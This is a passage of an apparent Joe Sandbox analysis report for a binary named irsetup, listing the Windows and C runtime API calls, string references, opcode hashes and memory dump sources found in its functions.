                                                                                                                    • Opcode ID: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
                                                                                                                    • Instruction ID: 5165d0e7630ab715d2080139ec972a0a1eb7dfbc78c08bfca532b6b1035b4b33
                                                                                                                    • Opcode Fuzzy Hash: 0b669dc38d1b02e4621c60ae251cc2d9fe0382d15873282476e5f311bfdc800a
                                                                                                                    • Instruction Fuzzy Hash: 56011A31304A8882E7B29B55F49179AB2A0FB8D7C4F558125AA8907755DF79C6488B40
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3731964398-0
                                                                                                                    • Opcode ID: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
                                                                                                                    • Instruction ID: 14398583cd06948a384385bef8cd944388f3e303429900c163158203f3a44866
                                                                                                                    • Opcode Fuzzy Hash: ed92aab74e24e1c157c9003b9606fb17f54fc7dbdfdefb113adb3dab755d3dc2
                                                                                                                    • Instruction Fuzzy Hash: 87218032300A8896EBBB9B25D9553DBB3A0F78C789F418125E75D87396DF38D668C700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3731964398-0
                                                                                                                    • Opcode ID: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
                                                                                                                    • Instruction ID: a232d29d29e465a5efbbe9cce7ee2381c15c0905e4f694560ebf159723a5cdbb
                                                                                                                    • Opcode Fuzzy Hash: 3c3da7c936a9a1d7d7928e9dc572b502ff7468b01418821e0a10ab2f620c66c2
                                                                                                                    • Instruction Fuzzy Hash: A9219D32300A8896EB6BDB64E8853DA73A0F38CB88F458126EA5D87755CF38D659C740
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    • Opcode ID: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
                                                                                                                    • Instruction ID: 1779db9e300c3f0be7c9e9f2cf91417e77d66518fa8146c6749ef4c91204d209
                                                                                                                    • Opcode Fuzzy Hash: 6db5ba4383936ebe8e135fc20a07d54cabfd9c019b671f35b81fbb6f7a59b079
                                                                                                                    • Instruction Fuzzy Hash: D911543231468D89EBB35765E4903EB6390A39D7CCF558532FA8D46286CE28C64E8710
                                                                                                                    APIs
                                                                                                                    • EnumSystemLocalesA.KERNEL32(?,?,00000140,000000018003786E,?,?,?,?,00000000,0000000180028F80), ref: 00000001800376EC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099609381-0
                                                                                                                    • Opcode ID: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
                                                                                                                    • Instruction ID: f37fcbef81f8ea48d901cc4db84f161ea8b218e8b27c5afce3cbb95621750e1d
                                                                                                                    • Opcode Fuzzy Hash: a772892202ddaf5bc622bbe73f4b19016f8f684e91aec17a0921c547e3cf381a
                                                                                                                    • Instruction Fuzzy Hash: B8115E767046088BFBAB9B31C4563EB23A1F358B8DF158815E60D46287CB78C6A98781
                                                                                                                    APIs
                                                                                                                    • EnumSystemLocalesA.KERNEL32(?,?,00000140,0000000180037836,?,?,?,?,00000000,0000000180028F80), ref: 0000000180037765
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                     • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                     • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnumLocalesSystem
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2099609381-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale_getptd
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3731964398-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: InfoLocale
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2299586839-0
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1012874770-0
                                                                                                                    APIs
                                                                                                                    • LoadLibraryA.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A235
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A251
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A279
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A282
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A298
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2A1
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2B7
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2C0
                                                                                                                    • GetProcAddress.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2DE
                                                                                                                    • EncodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A2E7
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A319
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A328
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A380
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3A0
                                                                                                                    • DecodePointer.KERNEL32(?,?,00000001,00000000,?,000000FC,00000000,000000018002F31C,?,?,?,?,00000001,000000018002F3B0), ref: 000000018003A3B9
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: Pointer$AddressDecodeProc$Encode$LibraryLoad
                                                                                                                    • String ID: GetActiveWindow$GetLastActivePopup$GetProcessWindowStation$GetUserObjectInformationA$MessageBoxA$USER32.DLL
                                                                                                                    • API String ID: 3085332118-232180764
                                                                                                                    APIs
                                                                                                                    Similarity
                                                                                                                    • API ID: __doserrno_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 921712934-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno_wsopen_s
                                                                                                                    • String ID: $ $ $ $ $=$UNICODE$UTF-16LE$UTF-8$a$ccs$r$w
                                                                                                                    • API String ID: 1497100469-1561892669
                                                                                                                    APIs
                                                                                                                    • CompareStringW.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 000000018003840D
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038421
                                                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,00000018,00000000,?,?,?,00000001800388E2), ref: 0000000180038524
                                                                                                                    Similarity
                                                                                                                    • API ID: CompareErrorInfoLastString
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3723911898-0
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Similarity
                                                                                                                    • API ID: CloseHandleProcess__doserrno_errno$CodeCreateErrorExitLastObjectSingleWaitfree
                                                                                                                    • String ID: cmd.exe
                                                                                                                    • API String ID: 1143201056-723907552
                                                                                                                    APIs
                                                                                                                      • Part of subcall function 000000018002753C: GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,000000018001252F), ref: 000000018002754A
                                                                                                                      • Part of subcall function 000000018002721C: __getgmtimebuf.LIBCMT ref: 000000018002722E
                                                                                                                    • wcsftime.LIBCMT ref: 0000000180012761
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: Time$FileSystem__getgmtimebufwcsftime
                                                                                                                    • String ID: !$%$day$hour$isdst$min$month$sec$wday$yday$year
                                                                                                                    • API String ID: 599264643-611614131
                                                                                                                    • Opcode ID: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
                                                                                                                    • Instruction ID: 3f311966028a47db9d835d2390ad335689aacd3f767fa76c62ac224867e760a9
                                                                                                                    • Opcode Fuzzy Hash: e8d60ccf7bee7e749e5e1b2cbf8c68d472027f5cf3e427ad52023df90c5721df
                                                                                                                    • Instruction Fuzzy Hash: 1F71B271204AC889EBA6EB21E4513EA7352EB8D7D1F48C212BD5A073DADE38C70DC740
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorFreeHeapLast_errno
                                                                                                                    • String ID: %.14g
                                                                                                                    • API String ID: 1012874770-3267037135
                                                                                                                    • Opcode ID: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
                                                                                                                    • Instruction ID: af0bc440c63a20798cdb7aeb7fc5255632f61c08f109e4c0f4434e2bfff94dc4
                                                                                                                    • Opcode Fuzzy Hash: 47d9f555a568b6f0783db94f213f62370508f50826c306b4ac1c19de6a4250bd
                                                                                                                    • Instruction Fuzzy Hash: EF41EE36602A8884EFE79F65D4553FC2360AB8CBD8F188432FA194A795CF74CB99D710
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_lock$ErrorFreeHeapLast_errno
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1575098132-0
                                                                                                                    • Opcode ID: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
                                                                                                                    • Instruction ID: cb46baaaa23a1663d07188939efbc8fc8364fa3fc97ea10782da97baff015f18
                                                                                                                    • Opcode Fuzzy Hash: 45039a1f34f5a8ca6a309a91bc759b7c570e1b30efeed7530d3bf206d5ce8a12
                                                                                                                    • Instruction Fuzzy Hash: D6310E35302A4885FEEBEB659061BFC2351AF8DBC4F48D526F91A476C6CE54CB4C8316
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$_errno$DecodeEnvironmentPointerVariable__wtomb_environ
                                                                                                                    • String ID: COMSPEC
                                                                                                                    • API String ID: 3451773520-1631433037
                                                                                                                    • Opcode ID: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
                                                                                                                    • Instruction ID: 4ba3cebf007e37312f75b89635b496495a772fde7ddc12decf222640a794de8d
                                                                                                                    • Opcode Fuzzy Hash: 138668e7748e24d3d92ce4ae88ceeb87a22b90512250c6b183fbb027a10e2112
                                                                                                                    • Instruction Fuzzy Hash: 4EA1B036601A9C81FAE3AB15A9003EF6391F7887DCF56C615BB5A87785CF38879D8300
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: free$ErrorInfoLast
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 189849726-0
                                                                                                                    • Opcode ID: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
                                                                                                                    • Instruction ID: 0cfcddc6f49efeab6f4f61afc9e86eb49e25840f6bfa506a9695891ebaf45d4b
                                                                                                                    • Opcode Fuzzy Hash: fdc52e7ef457eee3671ced87c46925b60b1a97f1e4e84eb13b3e6ac80a3ae5b4
                                                                                                                    • Instruction Fuzzy Hash: 27B19F32604AD486DBA2CF25E4503EEB7A4F748B84F95C126FB99877A5DF38C649C700
                                                                                                                    APIs
                                                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
                                                                                                                    • GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D576
                                                                                                                    • malloc.LIBCMT ref: 000000018003D58D
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D64C
                                                                                                                    • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D68C
                                                                                                                    • free.LIBCMT ref: 000000018003D69A
                                                                                                                    • free.LIBCMT ref: 000000018003D6BC
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$Infofree$malloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 1309074677-0
                                                                                                                    • Opcode ID: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
                                                                                                                    • Instruction ID: ef16a251ce0a63a525c3aa4d0bbb8d493572552397f9166123f23fc75798a009
                                                                                                                    • Opcode Fuzzy Hash: 8833ed16186a4408ec5588ce627eacfd5c2b61c901c329b3215a334107bb986e
                                                                                                                    • Instruction Fuzzy Hash: DA61E432204B8886E7A39F25B4403EB77D5F7897E8F158626FA5A43BD4DF38C6498700
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: EnvironmentStrings$Free$ByteCharMultiWide$ErrorLastfree
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 994105223-0
                                                                                                                    • Opcode ID: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
                                                                                                                    • Instruction ID: d9ef7338b76749b8665854ab0faee35fb482f0185a0d43e1efd96c80377bbde6
                                                                                                                    • Opcode Fuzzy Hash: b562fa2b34240d575bd56bcb114a87d5ce86f3de295457b19021f060fd77cd6e
                                                                                                                    • Instruction Fuzzy Hash: 3E41C33260475C82EAE7AF12A9443AB7791BB5CBC0F1AC454FA4707BA9CF78D658D300
                                                                                                                    APIs
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: _errno$_wfreopen
                                                                                                                    • String ID: =stdin$@%s$cannot %s %s: %s$open$read$reopen
                                                                                                                    • API String ID: 1073068216-1171916245
                                                                                                                    • Opcode ID: d7e4a053d725cb62ee5042be342918985159208fa4f717f7af988af5555a754d
                                                                                                                    • Instruction ID: 1853566ffd4394b5b462cd73b286757f755f6c0d306ff0bd9e01786340f21f8e
                                                                                                                    • Opcode Fuzzy Hash: d7e4a053d725cb62ee5042be342918985159208fa4f717f7af988af5555a754d
                                                                                                                    • Instruction Fuzzy Hash: 8051B731214A8881FEE7EB66A5813EE7795AB8E7C0F44D112FA4A47796DF38C34D8740
                                                                                                                    APIs
                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A64
                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037A76
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037AD6
                                                                                                                    • malloc.LIBCMT ref: 0000000180037B42
                                                                                                                    • MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037B8C
                                                                                                                    • GetStringTypeW.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037BA3
                                                                                                                    • free.LIBCMT ref: 0000000180037BB4
                                                                                                                    • GetStringTypeA.KERNEL32(?,?,?,?,?,?,00000008,0000000180037CD6), ref: 0000000180037C31
                                                                                                                    • free.LIBCMT ref: 0000000180037C41
                                                                                                                      • Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4B2
                                                                                                                      • Part of subcall function 000000018003D45C: GetCPInfo.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D4D1
                                                                                                                      • Part of subcall function 000000018003D45C: MultiByteToWideChar.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D5D5
                                                                                                                      • Part of subcall function 000000018003D45C: WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,?,00000001,?,?,?,00000000,?,00000000,?), ref: 000000018003D610
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: ByteCharMultiWide$StringType$Infofree$ErrorLastmalloc
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 3804003340-0
                                                                                                                    • Opcode ID: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
                                                                                                                    • Instruction ID: b72f06588925f2ba8d140ce4529a3e9eb07fecfdf33ec2bb692ee0be162e1f54
                                                                                                                    • Opcode Fuzzy Hash: ac954491406045a83ae058f29b84b2635aa9f93dc0ff5126d077dd45d2821ec1
                                                                                                                    • Instruction Fuzzy Hash: 1F618232300A888AE7B39F25E4407DAA7A2F74CBE8F158615FA1D53BD5DF74CA498740
                                                                                                                    APIs
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000002.00000002.4576684754.0000000180001000.00000020.00000001.01000000.00000006.sdmp, Offset: 0000000180000000, based on PE: true
                                                                                                                    • Associated: 00000002.00000002.4576632428.0000000180000000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576751655.000000018003F000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576804882.000000018004D000.00000004.00000001.01000000.00000006.sdmp
                                                                                                                    • Associated: 00000002.00000002.4576858507.0000000180052000.00000002.00000001.01000000.00000006.sdmp
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_2_2_180000000_irsetup.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID: DecodePointer$_initterm$ExitProcess_lock
                                                                                                                    • String ID:
                                                                                                                    • API String ID: 2551688548-0
                                                                                                                    • Opcode ID: 91fa77b406ca58debd3888dab31120533d0dae9adbe6a87bb51551a7cd56bf2b
                                                                                                                    • Instruction ID: 0925ad66611745c8ce2a8e9b3f352f1836afede7ec58ebd276bd38845fb38505
